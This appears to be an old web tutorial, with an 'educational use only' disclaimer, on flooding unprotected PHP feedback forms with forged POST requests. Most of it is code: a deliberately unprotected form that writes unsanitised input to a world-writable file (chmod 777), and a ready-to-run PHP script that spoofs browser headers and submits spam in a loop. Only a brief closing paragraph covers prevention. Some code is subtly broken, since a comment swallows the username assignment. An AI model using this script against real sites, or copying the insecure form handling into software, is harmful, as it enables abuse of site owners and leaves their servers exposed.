|
Introduction The following article is how to send fake HTTP requests to simple web forms in unlimited times, resulting in spaming specified web form. Please note, that this article is for educational use only. Respect the Internet community and don't do what I am about to show. It should help you to understand how you should prevent such injections.
Working example form.php - the "dummy" form used for this presentation. In this example it is placed in /http_inject/form.php. It stores all submitted data in form.txt file. Here's the source code of this file:
<?php
$var_date = date(Y).".".date(m).".".date(d);
$var_time = date(H).":".date(i).":".date(s);
if ( isset($_POST['submit']) )
{
//$_POST is set and we are going to save a feedback to the file
$handle = fopen("form.txt", "a");
$write = "$var_date $var_time || {$_POST['username']} || {$_POST['subject']} || {$_POST['feedback']}\n";
fwrite($handle, $write);
fclose($handle);
echo "thank you for your feedback";
}
else
{
//print form
?>
<form name="feedback" method="post" action=<?php echo $_SERVER['PHP_SELF']; ?>>
<label>Your name:
<input type="text" name="username" id="input_user" />
</label>
<br />
<label>Subject of the message:
<input type="text" name="subject" id="input_subject" />
</label>
<br />
<label>Message:
<textarea name="feedback" id="input_feedback"></textarea>
</label>
<br />
<input type="submit" name="submit" id="input_submit" value="send" />
</form>
<?php
}
?>
make sure the form.txt is writable in your web server (chmod 777).
inject.php - script, which injects HTTP request to the defined script:
<?php
error_reporting(0);
set_time_limit(10);
//written by [lexx]
//set full path to your form
$_settings['url'] = "http://localhost/_http_inject/form.php";
//set all field names and values to this array.
//you may add or remove any of these items, depending on your form requirements$_forms['username'] = "Mr.Spammer";
$_forms['subject'] = "Total_spam";
$_forms['feedback'] = "goto%20http%3A%2F%2Fwww.google.com%2F";
$_forms['submit'] = "send";
//number of injects
$injects_no = 10;
/*NO NEED TO CHANGE FURTHER DATA*/
//parsing url
$_settings = parse_url($_settings['url']);
isset($_settings['port']) ? null : $_settings['port'] = 80;
//performing ijects
$counting = 0;
while ($counting <= $injects_no)
{
http_inject();
$counting++;
}
function http_inject()
{
global $_settings;
global $_forms;
//create POST STRING
$request_body = NULL;
$count = 0;
foreach ($_forms as $key => $item)
{
$request_body .= "$key=$item";
//add &
if ( $count <= count($_forms)-2 )
{
$request_body .= "&";
}
$count++;
}
//create headers
$request_headers = NULL;
$request_headers .= "POST {$_settings['path']}".( isset($_settings['query']) ? "?{$_settings['query']}" : "" )." HTTP/1.1\r\n";
$request_headers .= "Host: {$_settings['host']}\r\n";
$request_headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1\r\n";
$request_headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$request_headers .= "Accept-Language: lt,en-us;q=0.7,en;q=0.3\r\n";
$request_headers .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$request_headers .= "Connection: close\r\n";
$request_headers .= "Referer: {$_settings['scheme']}://{$_settings['host']}{$_settings['path']}".( isset($_settings['query']) ? "?{$_settings['query']}" : "" )."\r\n";
$request_headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request_headers .= "Content-Length: ".strlen($request_body)."\r\n";
$request_headers .= "\r\n";
//open socket
$socket_handle = NULL;
$socket_handle = fsockopen($_settings['host'], $_settings['port'], &$errno, &$errstr, 30);
//send request+body
fwrite($socket_handle, $request_headers.$request_body, strlen($request_headers)+strlen($request_body) );
//read responce if we want
/*
do
{
$responce_body .= fread($socket_handle, 1024);
}
while( !feof($socket_handle) );
echo $responce_body;
*/
//close socket
fclose($socket_handle);
}
?>
How it works Well, first of all, inject.php creates dummy html header pretend he is a web browser which is trying to submit a form to a server. If the server does not have any protection mechanisms installed, the form is "submitted". More over, you can specify the amount of injects in inject.php, so you can perform multiple attacks on one execution. Prevention The most efficient way to prevent such "automated submits" is to install a random image generator, where is written short phrase and the user must write into a special form what is written in that image (most of forums has it). On submit, the server checks if the text in special input field is the same as written in the image. If yes, the form is processed, if no, the user receives warning he needs to specify all the fields correctly.
email:
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it
Related Items:
|
